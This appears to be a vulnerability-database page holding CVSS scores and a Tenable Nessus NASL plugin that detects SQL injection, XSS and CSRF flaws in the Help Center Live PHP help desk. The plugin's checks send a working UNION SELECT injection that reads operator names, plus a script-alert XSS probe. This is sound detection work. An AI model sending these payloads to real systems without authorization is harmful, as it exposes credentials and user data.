CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
EPSS
Percentile
56.8%
The remote host is running Help Center Live, a help desk written in PHP that suffers from multiple vulnerabilities:
Multiple SQL Injection Vulnerabilities The application fails in many cases to sanitize user- supplied input before using it in database queries. As long as PHP’s ‘magic_quotes_gpc’ setting is ‘off’, an attacker can exploit these flaws to uncover sensitive information such as user’s names and password hashes.
Multiple Cross-Site Scripting Vulnerabilities.
There are several ways that an attacker can inject arbitrary HTML and script code into a user’s browser via the affected application. By exploiting them, an attacker can not only steal cookies but also cause a logged-in admin to perform arbitrary requests.
A Cross-Site Request Forgery issue was reported in view.php.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description) {
script_id(18296);
script_version("1.23");
script_cve_id("CVE-2005-1672", "CVE-2005-1673", "CVE-2005-1674");
script_bugtraq_id(13666, 13667);
script_name(english:"Help Center Live Multiple Vulnerabilities (SQLi, XSS, CSRF)");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from
multiple vulnerabilities." );
script_set_attribute(attribute:"description", value:
"The remote host is running Help Center Live, a help desk written in
PHP that suffers from multiple vulnerabilities:
- Multiple SQL Injection Vulnerabilities
The application fails in many cases to sanitize user-
supplied input before using it in database queries. As
long as PHP's 'magic_quotes_gpc' setting is 'off', an
attacker can exploit these flaws to uncover sensitive
information such as user's names and password hashes.
- Multiple Cross-Site Scripting Vulnerabilities.
There are several ways that an attacker can inject
arbitrary HTML and script code into a user's browser
via the affected application. By exploiting them, an
attacker can not only steal cookies but also cause a
logged-in admin to perform arbitrary requests.
- A Cross-Site Request Forgery issue was reported
in view.php." );
# http://web.archive.org/web/20100904025851/http://www.gulftech.org/?node=research&article_id=00076-05172005
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6d22c288" );
script_set_attribute(attribute:"solution", value:
"Contact the vendor for a patch." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);
script_set_attribute(attribute:"plugin_publication_date", value: "2005/05/18");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/05/17");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
summary["english"] = "Checks for multiple vulnerabilities (2) in Help Center Live";
script_summary(english:summary["english"]);
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/PHP");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
# For each CGI directory...
foreach dir (cgi_dirs()) {
# Grab the faq.
r = http_send_recv3(method: "GET", item:string(dir, "/faq/index.php"), port:port);
if (isnull(r)) exit(0);
# If it looks like Help Center Live...
pat = '<a href="http://www\\.helpcenterlive\\.com".+>Help Center Live ([^<]+)</a>';
if (egrep(string:r[2], pattern:pat, icase:TRUE)) {
# Try a SQL injection.
# nb: this requires magic_quotes_gpc to be off.
r = http_send_recv3(method: "GET",
item:string(
dir, "/faq/index.php?",
"x=f&",
# nb: this returns a table with the NASL script name in one row and
# the operator's id in another if the application is vulnerable.
"id=-99'%20UNION%20SELECT%200,0,'", SCRIPT_NAME, "',operator%20FROM%20hcl_operators%20WHERE%201--"
),
port:port
);
if (isnull(r)) exit(0);
# There's a problem if we see the script name in a table.
if (
'<input type="submit" name="search" value="Search" /></td>' >< r[2] &&
string('<td align="center" width="100%"><b>', SCRIPT_NAME, "</b></td>") >< r[2]
) {
security_warning(port);
set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
exit(0);
}
# If that failed to pick up anything, try to exploit one of the XSS flaws.
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);
# A simple alert.
xss = "<script>alert('" + SCRIPT_NAME + " was here');</script>";
# nb: the url-encoded version is what we need to pass in.
exss = "%3Cscript%3Ealert('" + SCRIPT_NAME + "%20was%20here')%3B%3C%2Fscript%3E";
r = http_send_recv3(method: "GET",
item:string(
dir, "/faq/index.php?",
'find=foo">', exss, "&",
"search=Search"
),
port:port
);
if (isnull(r)) exit(0);
# There's a problem if we see our XSS.
if (xss >< r[2]) {
security_warning(port);
set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
exit(0);
}
}
}
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
EPSS
Percentile
56.8%